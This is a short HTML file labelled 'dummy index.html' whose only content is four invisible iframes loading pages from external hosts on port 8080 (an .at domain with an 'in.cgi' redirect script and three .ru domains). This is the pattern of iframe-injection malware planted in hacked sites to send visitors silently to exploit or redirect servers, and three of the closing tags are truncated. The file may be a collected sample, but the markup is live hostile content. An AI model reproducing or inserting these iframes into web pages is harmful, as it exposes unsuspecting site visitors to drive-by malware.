<!-- dummy index.html -->

<iframe src="http://c6y.at:8080/ts/in.cgi?pepsi143" width=125 height=125 style="visibility: hidden"></ifram
<iframe src="http://3b8.ru:8080/index.php" width=185 height=195 style="visibility: hidden"></ifra
<iframe src="http://3cq.ru:8080/index.php" width=179 height=108 style="visibility: hidden"></ifr
<iframe src="http://3e0.ru:8080/index.php" width=199 height=197 style="visibility: hidden"></iframe>